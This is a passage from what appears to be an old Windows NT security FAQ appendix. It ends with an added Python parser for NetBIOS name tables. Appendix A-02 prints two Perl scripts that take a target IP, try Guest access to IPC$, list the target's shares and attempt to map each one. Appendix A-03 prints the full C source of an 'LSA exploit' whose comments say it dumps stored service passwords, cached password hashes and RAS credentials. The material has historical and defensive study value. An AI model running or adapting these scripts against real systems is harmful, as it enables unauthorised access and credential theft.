        set templist [NT_LocalGroupGetUsers [lindex $wrkstalist $listindex] [lindex $machinegrouplist $tempindex]];
        puts $auditlog "\nUsers in the \"[lindex $machinegrouplist $tempindex]\" group:\n";
        printListWithAccountStatus $templist $auditlog [lindex $wrkstalist $listindex];
        incr tempindex;
    }
    incr listindex;
}

close $auditlog

---------------------------------------------------------------------------
Appendix Section A-02. Perl Code for NETSCRIPT.PL
---------------------------------------------------------------------------

Author is David LeBlanc. Both versions take a target IP address, pull its NetBIOS name table with nbtstat, try a null-password Guest connection to IPC$, list the exported shares with net view, and then attempt to map each share.

------------- start netcheck.pl (Win NT Version) ---------------------------
if(length($ARGV[0]) == 0) {
    print "Usage is perl netcheck.pl IP";
    exit 0;
}

# pull the remote NetBIOS name table; <00> UNIQUE is the machine name,
# <00> GROUP is the domain or workgroup
open(NBT, "nbtstat -a ".$ARGV[0]." | ");
while(<NBT>) {
    if(!grep(/Registered/, $_)) {
        if(grep(/<00> UNIQUE/,$_)) {
            @machine = split(/\s/, $_);
        }
        if(grep(/<00> GROUP/, $_)) {
            @domain = split(/\s/, $_);
        }
    }
}
close(NBT);
print "Machine = ".$machine[0]."\tDomain = ".$domain[0]."\n";

print "\nChecking Guest Access\n";
open(GUESTCHK, "net use \\\\".$ARGV[0]."\\ipc\$ /user:guest guest | ");
while(<GUESTCHK>) {
    if(grep(/error/,$_)) {
        print("Guest access denied\n");
    }
}
close(GUESTCHK);

print "\nObtaining list of shares\n";
open(NTSH, "net view \\\\".$ARGV[0]." | ");
while(<NTSH>) {
    if(grep(/Disk/,$_)) {
        @tmp = split(/\s/, $_);
        push(@shares, $tmp[0]);
    }
    print;
}
close(NTSH);

# try to map every disk share we saw
foreach $share (@shares) {
    open(NETUSE, "net use \\\\".$ARGV[0]."\\".$share." | ");
    while(<NETUSE>) {
        if(grep(/successfully/,$_)) {
            print $share." opened\n";
        }
    }
    close(NETUSE);
}
------------- end netcheck.pl (Win NT Version) ---------------------------

------------- start netcheck.pl (Win 95 Version) ---------------------------
if(length($ARGV[0]) == 0) {
    print "Usage is perl netcheck.pl IP";
    exit 0;
}

# same idea as above; -A takes an IP address, and here the name table
# is printed as it goes by
open(NBT, "nbtstat -A ".$ARGV[0]." | ");
while(<NBT>) {
    print;
    if(grep(/Registered/, $_)) {
        if(grep(/<00> UNIQUE/,$_)) {
            @machine = split(/\s/, $_);
        }
        if(grep(/<00> GROUP/, $_)) {
            @domain = split(/\s/, $_);
        }
    }
}
close(NBT);
print "Machine = ".$machine[0]."\tDomain = ".$domain[0]."\n";

print "\nChecking Guest Access\n";
open(GUESTCHK, "net use \\\\".$ARGV[0]."\\ipc\$ /user:guest guest | ");
while(<GUESTCHK>) {
    if(grep(/error/,$_)) {
        print("Guest access denied\n");
    }
}
close(GUESTCHK);

print "\nObtaining list of shares\n";
open(NTSH, "net view \\\\".$machine[0]." | ");
while(<NTSH>) {
    if(grep(/Disk/,$_)) {
        @tmp = split(/\s/, $_);
        push(@shares, $tmp[0]);
    }
    print;
}
close(NTSH);

foreach $share (@shares) {
    open(NETUSE, "net use \\\\".$machine[0]."\\".$share." | ");
    while(<NETUSE>) {
        if(grep(/successfully/,$_)) {
            print $share." opened\n";
        }
    }
    close(NETUSE);
}
------------- end netcheck.pl (Win 95 Version) ---------------------------

Appendix Section A-03.
Source Code for NT LSA Exploit --------------------------------------------------------------------------- Author is Paul Ashton /* * Must be run as administrator. Might be a good thing to play with after * running getadmin ;-0 -- also note this works on raw 4.0 with no SPs. * * Run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data * or any other registry key under NTLM\security\policy\secrets. * You should be able to get service passwords, cached password hashes * of the last users to login, RAS accounts and passwords, workstation * passwords for domain access, etc. */ #include #include #include "ntsecapi.h" #define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else void write(); PLSA_UNICODE_STRING str(LPWSTR x) { static LSA_UNICODE_STRING s; s.Buffer=x; s.Length=wcslen(x)*sizeof(WCHAR); s.MaximumLength = (wcslen(x)+1)*2; return &s; } int _cdecl main(int argc, char *argv[]) { LSA_HANDLE pol; PLSA_UNICODE_STRING foo; LSA_OBJECT_ATTRIBUTES attrs; WCHAR keyname[256]=L""; WCHAR host[256]=L""; wsprintfW(keyname, L"%hS", argv[1]); if(argc == 3) wsprintfW(host, L"%hS", argv[2]); memset(&attrs, 0, sizeof(attrs)); AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol)); AST(!LsaRetrievePrivateData(pol, str(keyname), &foo)); write(1, foo->Buffer, foo->Length); LsaClose(pol); exit(0); }
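The NetBIOS name-table parsing that both netcheck.pl versions in Appendix A-02 do with grep and split, written out as an added Python example (not part of the FAQ and not David LeBlanc's code) that copes with the indented rows, the double space after the <xx> suffix, and rows whose status is not Registered; the nbtstat output it reads is constructed, not captured from a real host.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample of "nbtstat -A <ip>" output (not captured from a real host).
SAMPLE_NBTSTAT = """
       NetBIOS Remote Machine Name Table

           Name               Type         Status
        ---------------------------------------------
        OLDNAME        <00>  UNIQUE      Conflict
        NTSRV01        <00>  UNIQUE      Registered
        NTSRV01        <20>  UNIQUE      Registered
        NTDOM          <00>  GROUP       Registered
        NTDOM          <1C>  GROUP       Registered
        NTDOM          <1B>  UNIQUE      Registered

        MAC Address = 00-00-00-00-00-00
"""

class NbtName(NamedTuple):
    name: str     # NetBIOS name as printed (padding removed)
    suffix: int   # service suffix shown as <xx>, e.g. 0x00 workstation, 0x20 server
    kind: str     # "UNIQUE" or "GROUP"
    status: str   # "Registered", "Conflict", ...

# One name-table row: indented name, <hex suffix>, UNIQUE/GROUP, status word.
_ROW = re.compile(r"^\s*(\S.*?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")

def parse_name_table(text: str) -> List[NbtName]:
    """Every name-table row of nbtstat output, in order; header/footer lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            rows.append(NbtName(m.group(1), int(m.group(2), 16), m.group(3), m.group(4)))
    return rows

def machine_and_domain(text: str) -> Tuple[Optional[str], Optional[str]]:
    """Same answer netcheck.pl prints: the first registered <00> UNIQUE name is
    the machine, the first registered <00> GROUP name is the domain/workgroup."""
    machine = domain = None
    for row in parse_name_table(text):
        if row.suffix != 0x00 or row.status != "Registered":
            continue  # e.g. the OLDNAME row, which is in Conflict and must not win
        if row.kind == "UNIQUE" and machine is None:
            machine = row.name
        elif row.kind == "GROUP" and domain is None:
            domain = row.name
    return machine, domain

if __name__ == "__main__":
    print("Machine = %s\tDomain = %s" % machine_and_domain(SAMPLE_NBTSTAT))
```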